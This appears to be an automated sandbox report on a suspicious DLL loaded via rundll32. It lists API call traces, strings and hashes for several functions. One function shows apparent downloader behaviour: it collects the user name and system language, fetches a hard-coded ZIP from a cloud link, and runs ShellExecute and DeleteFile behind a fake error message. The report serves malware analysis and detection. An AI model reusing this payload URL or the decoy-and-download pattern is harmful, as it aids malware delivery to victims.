                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,00020019,?,80000002,Software\Embarcadero\Locales,00000000,00020019,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000), ref: 6C7CF6DC
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,00020019,?,80000001,Software\CodeGear\Locales,00000000,00020019,?,80000002,Software\Embarcadero\Locales,00000000,00020019,?,80000001), ref: 6C7CF6FA
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,00020019,?,80000002,Software\CodeGear\Locales,00000000,00020019,?,80000001,Software\CodeGear\Locales,00000000,00020019,?,80000002), ref: 6C7CF718
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,00020019,?,80000001,Software\Borland\Locales,00000000,00020019,?,80000002,Software\CodeGear\Locales,00000000,00020019,?,80000001), ref: 6C7CF736
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales,00000000,00020019,?,00000000,6C7CF83C), ref: 6C7CF770
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,?,00000000,6C7CF818,?,80000001), ref: 6C7CF795
                    • RegCloseKey.ADVAPI32(?,6C7CF81F,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,6C7CF818,?,80000001,Software\Embarcadero\Locales), ref: 6C7CF810
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Open$QueryValue$CloseFileModuleName
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                    • API String ID: 2701450724-3496071916
                    • Opcode ID: 94724162d68979dd298383361c4cf5e4d982cf24c5fe59c564b5e6578fbad075
                    • Instruction ID: cbfae4a62b378cc28ea6e45c0bec81fcd311d52e43a94ea934a1adf2361445e9
                    • Opcode Fuzzy Hash: 94724162d68979dd298383361c4cf5e4d982cf24c5fe59c564b5e6578fbad075
                    • Instruction Fuzzy Hash: DD517771B4020ABEEB50D7A1DE49FEE73FCEB04704F604425B914F6A81D7749A049B66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7F1208 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetVersionExW.KERNEL32(00000114,?,6C7F1470,00000000,6C7F148A,?,?,6C7F14A2,6C941DF7,0000FFC6,6C93D488,6C94211C,0000FFC6,00000000,?), ref: 6C7F1222
                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?,00000114,?,6C7F1470,00000000,6C7F148A,?,?,6C7F14A2,6C941DF7,0000FFC6,6C93D488), ref: 6C7F1283
                    • RegQueryValueExW.ADVAPI32(?,DisplayVersion,00000000,00000000,00000000,?,00000000,6C7F139A,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?,00000114), ref: 6C7F12B1
                    • RegQueryValueExW.ADVAPI32(?,DisplayVersion,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000,00000000,?,00000000,6C7F139A,?,80000002), ref: 6C7F12F3
                    • RegQueryValueExW.ADVAPI32(?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000,00000000,?,00000000,6C7F139A,?,80000002), ref: 6C7F130D
                    • RegQueryValueExW.ADVAPI32(?,ReleaseId,00000000,00000000,00000000,?,?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000), ref: 6C7F134F
                    • RegQueryValueExW.ADVAPI32(?,UBR,00000000,00000000,6CD5E960,?,?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000), ref: 6C7F1371
                    • RegCloseKey.ADVAPI32(?,6C7F13A1,00000000,6CD5E960,?,?,ReleaseId,00000000,00000000,00000000,?,?,DisplayVersion,00000000,00000000,00000000), ref: 6C7F1392
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: QueryValue$CloseOpenVersion
                    • String ID: DisplayVersion$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                    • API String ID: 4211099411-3678894217
                    • Opcode ID: 3bcc383f78f13b47d034871eeeb772c312a1d10f7bd1735541fbe5a01f59efb8
                    • Instruction ID: 5c2e7be4b19e6f7e83a5398dc20d3b48d04d4edd71854693056ac8ac4463091b
                    • Opcode Fuzzy Hash: 3bcc383f78f13b47d034871eeeb772c312a1d10f7bd1735541fbe5a01f59efb8
                    • Instruction Fuzzy Hash: 934161B5B00209AFEB50DBA4CE89FDE77BCAB45304F504461E610E6F84D774EA498B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB850 Relevance: 19.7, APIs: 8, Strings: 5, Instructions: 238sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 6C7E979C: CreateDirectoryW.KERNEL32(00000000,00000000,?,6C9DB9D7,6C9DBCE4,?,6C9DBCE4,?,?,00000003,00000000,6C9DBC16), ref: 6C7E97A9
                      • Part of subcall function 6C9DB2F4: GetUserNameW.ADVAPI32(00000000,00000400), ref: 6C9DB31E
                      • Part of subcall function 6C9DB784: GetSystemDefaultLangID.KERNEL32 ref: 6C9DB79A
                      • Part of subcall function 6C9DB784: VerLanguageNameW.KERNEL32(?,?,000000FA), ref: 6C9DB7B3
                      • Part of subcall function 6C9DB4D4: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6C9DB523
                      • Part of subcall function 6C9DB4D4: InternetOpenUrlW.WININET(?,00000000,00000000,00000000,00000000,00000000), ref: 6C9DB540
                      • Part of subcall function 6C9DB4D4: InternetReadFile.WININET(00000000,?,00000400,?), ref: 6C9DB58A
                      • Part of subcall function 6C9DB4D4: InternetCloseHandle.WININET(00000000), ref: 6C9DB5C8
                      • Part of subcall function 6C9DB4D4: InternetCloseHandle.WININET(?), ref: 6C9DB5D1
                    • Sleep.KERNEL32(000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?,6C9DBCE4,?,6C9DBCE4), ref: 6C9DBA55
                    • Sleep.KERNEL32(000000E9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?,6C9DBCE4,?), ref: 6C9DBA5F
                    • Sleep.KERNEL32(000000E9,00000000,000000E9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?), ref: 6C9DBA81
                    • Sleep.KERNEL32(0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?,6C9DBCE4), ref: 6C9DBA98
                    • Sleep.KERNEL32(0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?,6C9DBCE4,6C9DBCE4,?), ref: 6C9DBAA2
                    • Sleep.KERNEL32(00000F96,6C9DBCE4,?,0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?,?), ref: 6C9DBAF4
                    • Sleep.KERNEL32(000000E7,00000F96,6C9DBCE4,?,0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF,?,?,6C9DBD04,?,6C9DBCF4,?), ref: 6C9DBAFE
                      • Part of subcall function 6C9DB600: ShellExecuteW.SHELL32(00000000,open,00000000,?,?,?), ref: 6C9DB6D1
                    • Sleep.KERNEL32(000000E8,6C9DBB86,?,6C9DBCE4,6C9DBCE4,?,000000E7,00000F96,6C9DBCE4,?,0000008B,0000008B,6C9DBBE9,000000E9,00000000,6C9DBBDF), ref: 6C9DBB95
                      • Part of subcall function 6C9DB404: DeleteFileW.KERNEL32(00000000,00000000,6C9DB44C,?,00000000,6C9DB46E), ref: 6C9DB43D
                    Strings
                    • Error 0x0000007b The Application was unable to start correctly, xrefs: 6C9DB8A2
                    • Chin, xrefs: 6C9DB90F
                    • Jap, xrefs: 6C9DB8EC
                    • 6569, xrefs: 6C9DBA64
                    • https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip, xrefs: 6C9DB853
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep$Internet$CloseFileHandleNameOpen$CreateDefaultDeleteDirectoryExecuteLangLanguageReadShellSystemUser
                    • String ID: 6569$Chin$Error 0x0000007b The Application was unable to start correctly$Jap$https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip
                    • API String ID: 3771374485-2171053703
                    • Opcode ID: cffb3705339115505eadf5c51d4b1400ea5fe29651e9fae170b571bde7cf1a6c
                    • Instruction ID: 34e3077822253f2199be71b9fa421b86fb67e1031f2de8ee267895032e88994c
                    • Opcode Fuzzy Hash: cffb3705339115505eadf5c51d4b1400ea5fe29651e9fae170b571bde7cf1a6c
                    • Instruction Fuzzy Hash: 66914830A009099FDB11DBA4CE49ADEBBB9BF58708F528465E510B7F54DB30F9098B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF2CC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • EnterCriticalSection.KERNEL32(6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39,?,?,00000000,00000000,00000000), ref: 6C7CF2EA
                    • LeaveCriticalSection.KERNEL32(6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39,?,?,00000000,00000000), ref: 6C7CF30E
                    • LeaveCriticalSection.KERNEL32(6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39,?,?,00000000,00000000), ref: 6C7CF31D
                    • IsValidLocale.KERNEL32(00000000,00000002,6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39), ref: 6C7CF32F
                    • EnterCriticalSection.KERNEL32(6CD5DC14,00000000,00000002,6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39), ref: 6C7CF38C
                    • LeaveCriticalSection.KERNEL32(6CD5DC14,6CD5DC14,00000000,00000002,6CD5DC14,6CD5DC14,00000000,6C7CF3D2,?,?,?,00000000,?,6C7CFCD8,00000000,6C7CFD39), ref: 6C7CF3B5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                    • String ID: en-GB,en,en-US,
                    • API String ID: 975949045-3021119265
                    • Opcode ID: 702ad9271b97ff8ec2dfea0919e50ccb2dac7c48e15c269349bdcf63e433d1f6
                    • Instruction ID: a46f5b0d613803fa063724ccc3d3a9f817b9c0b7c9fe02fbb5ce4b4c45067d58
                    • Opcode Fuzzy Hash: 702ad9271b97ff8ec2dfea0919e50ccb2dac7c48e15c269349bdcf63e433d1f6
                    • Instruction Fuzzy Hash: B721A520704517AFEB10A7B89B0D6AE32999B4E34CB904832A460DBF54CFB59D4893B7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7D2AE8 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 438 6c7d2ae8-6c7d2b82 call 6c7d2f98 call 6c7d2fa8 call 6c7d2fb8 call 6c7d2fc8 * 3 451 6c7d2bac-6c7d2bb9 438->451 452 6c7d2b84-6c7d2ba7 RaiseException 438->452 454 6c7d2bbe-6c7d2bde 451->454 455 6c7d2bbb 451->455 453 6c7d2dbc-6c7d2dc2 452->453 456 6c7d2bf1-6c7d2bf9 454->456 457 6c7d2be0-6c7d2bef call 6c7d2fd8 454->457 455->454 459 6c7d2bfc-6c7d2c05 456->459 457->459 461 6c7d2c1e-6c7d2c20 459->461 462 6c7d2c07-6c7d2c17 459->462 463 6c7d2c26-6c7d2c2d 461->463 464 6c7d2ce2-6c7d2cec 461->464 462->461 472 6c7d2c19 462->472 466 6c7d2c3d-6c7d2c3f 463->466 467 6c7d2c2f-6c7d2c3b 463->467 468 6c7d2cfc-6c7d2cfe 464->468 469 6c7d2cee-6c7d2cfa 464->469 473 6c7d2c4c-6c7d2c4e 466->473 474 6c7d2c41-6c7d2c4a LoadLibraryA 466->474 467->466 470 6c7d2d4b-6c7d2d4d 468->470 471 6c7d2d00-6c7d2d04 468->471 469->468 481 6c7d2d4f-6c7d2d5e GetLastError 470->481 482 6c7d2d95-6c7d2d98 470->482 478 6c7d2d3f-6c7d2d49 GetProcAddress 471->478 479 6c7d2d06-6c7d2d0a 471->479 480 6c7d2d9a-6c7d2da1 472->480 476 6c7d2c9b-6c7d2ca7 call 6c7d23d8 473->476 477 6c7d2c50-6c7d2c5f GetLastError 473->477 474->473 498 6c7d2cdc-6c7d2cdd FreeLibrary 476->498 499 6c7d2ca9-6c7d2cad 476->499 484 6c7d2c6f-6c7d2c71 477->484 485 6c7d2c61-6c7d2c6d 477->485 478->470 479->478 488 6c7d2d0c-6c7d2d17 479->488 486 6c7d2dba 480->486 487 6c7d2da3-6c7d2db2 480->487 490 6c7d2d6e-6c7d2d70 481->490 491 6c7d2d60-6c7d2d6c 481->491 482->480 484->476 493 6c7d2c73-6c7d2c96 RaiseException 484->493 485->484 486->453 487->486 488->478 494 6c7d2d19-6c7d2d1f 488->494 490->482 492 6c7d2d72-6c7d2d92 RaiseException 490->492 491->490 492->482 493->453 494->478 497 6c7d2d21-6c7d2d2e 494->497 497->478 501 6c7d2d30-6c7d2d3b 497->501 498->464 499->464 502 6c7d2caf-6c7d2cbd LocalAlloc 499->502 501->478 503 6c7d2d3d 501->503 502->464 504 6c7d2cbf-6c7d2cda 502->504 503->482 504->464
                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 6C7D2BA0
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 5b3ec9703fa85bf261f160e13543ca55a26536603a91e92089ae923cf7b0deb7
                    • Instruction ID: c54eaa65479405428b612a29cbbc356cc5e924140ba7a91f20de91e148a0f99a
                    • Opcode Fuzzy Hash: 5b3ec9703fa85bf261f160e13543ca55a26536603a91e92089ae923cf7b0deb7
                    • Instruction Fuzzy Hash: 34A1A371A00309AFDB10DFA4DA89BDEB7B5BF48304F654529E914A7780DB70BD46CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9B1AEC Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1B2A
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1B5B
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1B8C
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1BBD
                    • FlatSB_SetScrollProp.COMCTL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1BEB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FlatPropScroll
                    • String ID:
                    • API String ID: 3625857538-0
                    • Opcode ID: cf289cb58bfc07c18cfd0f11fa45ac0a9d710349b21c1d327a611ab6fd6dca60
                    • Instruction ID: 21657ea4e38bd45ea201db479c7d6ed764efe32174102b4e96be4443c2645499
                    • Opcode Fuzzy Hash: cf289cb58bfc07c18cfd0f11fa45ac0a9d710349b21c1d327a611ab6fd6dca60
                    • Instruction Fuzzy Hash: 4531C570600198AFDB60CF5CC980E6277FCAB2A308B564995F288DB762D736ED54CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E8CF8 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 524 6c7e8cf8-6c7e8d18 call 6c7cbab4 GetFileAttributesW 527 6c7e8d1a-6c7e8d20 524->527 528 6c7e8d96-6c7e8d9d 524->528 529 6c7e8d2d-6c7e8d31 527->529 530 6c7e8d22-6c7e8d2b 527->530 531 6c7e8d33-6c7e8d4e CreateFileW 529->531 532 6c7e8d61-6c7e8d67 529->532 530->528 531->528 533 6c7e8d50-6c7e8d5f CloseHandle 531->533 534 6c7e8d6d-6c7e8d88 CreateFileW 532->534 535 6c7e8d69-6c7e8d6b 532->535 533->528 536 6c7e8d8a-6c7e8d92 CloseHandle 534->536 537 6c7e8d94 534->537 535->528 536->528 537->528
                    APIs
                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,6C9DB993,6C9DBCE4,?,?,00000003,00000000,6C9DBC16), ref: 6C7E8D0E
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,6C9DB993,6C9DBCE4,?), ref: 6C7E8D46
                    • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,6C9DB993,6C9DBCE4), ref: 6C7E8D51
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
